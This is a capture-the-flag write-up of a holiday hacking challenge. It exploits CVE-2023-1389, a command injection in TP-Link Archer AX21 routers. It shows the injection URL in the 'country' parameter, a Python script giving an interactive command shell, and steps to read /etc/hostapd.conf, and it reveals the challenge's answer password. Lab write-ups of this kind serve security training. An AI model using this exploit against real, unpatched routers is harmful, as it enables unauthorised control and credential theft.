Dosis Network Down

  Challenge Progession:
Act II
Difficulty:
  Location:
24-Seven
Dosis Network Down
Buggered Wifi

This challenge is located inside the 24-Seven store. JJ explains that the Dosis Wifi has been tampered with by Gnomes! They have changed some settings including the admin password. It is up to us to take back control of the Wifi. We are challenged with learning the administrator password.

Known CVEs

Clicking the terminal connects us to the Wifi Router administration page. There is some important information here. Notice the hardware version is a (rebranded) off-the-shelf TP-Link Archer AX21.

Hardware Version
This router has a known remote code exection vulnerability. Check out this statement by TP-LINK regarding the issue. If these routers remain unpatched, an attacker may achieve remote code execution unauthenticated.

This issue is documented as CVE-2023-1389. If I'm looking for an off-the-shelf exploit a good place to start is by researching proof-of-concepts posted to sites like Github. Here is a good example of a Github repository that has information about the vulnberability as well as a PoC for a Python reverse shell:

https://github.com/Voyag3r-Security/CVE-2023-1389

It is important to never blindly run code you find on the internet. I like to look at the example PoC and see what it's doing and then decide to either write an exploit myself or use theirs. In this case it looks like there is an unauthenticated endpoint that can be called to directly execute a command and print the results. I have to say, its usually not that easy to exploit, but I will take it.

The Exploit

According to the CVE document, the vulnerable endpoint of the Dosis Neighborhood router is:

https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(ls)
Note that the vulnerable parameter is "country". Here we can substitute the country code for a bash command. There is a quirk where you must submit the URL 2 times to see the output of the command. The directory listing command "ls -la" worked:
Directory Listing
Editing the command in the URL and submitting it twice to see the output is such a pain. I wrote me own expoit.
import requests
import argparse

parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest="router", default="dosis-network-down.holidayhackchallenge.com", help="Router URL")

args = parser.parse_args()

def send_cmd(router, cmd):
    url = f"https://{router}/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$({cmd})"
    r1 = requests.get(url)
    r2 = requests.get(url)
    
    if r1.status_code == 200 and r1.text != "OK":
        return r1.text
    if r2.status_code == 200 and r2.text != "OK":
        return r2.text
    return None
    
host = args.router

print("Router Interactive Shell")
print(f"\t {host}")
print("Use Ctrl+c to exit\n")

try:
    while True:
        i = input(">>> ")
        result = send_cmd(host, i)
        print(result)
except KeyboardInterrupt as e:
    print("\nCtrl+c")
    print("Exiting...")

My exploit makes executing and reading the output much easier and it doesn't need a reverse shell. It just makes the requests and prints the output. It does this in a loop until the user quits.

My Exploit

The Password

Now to track down that password. After some research I found that the config file for this router is located at the location "/etc/hostapd.conf". I printed out this file and found the password!

Admin Password!
The password is "SprinklesAndPackets2025!". Enter this in your badge to complete the challenge!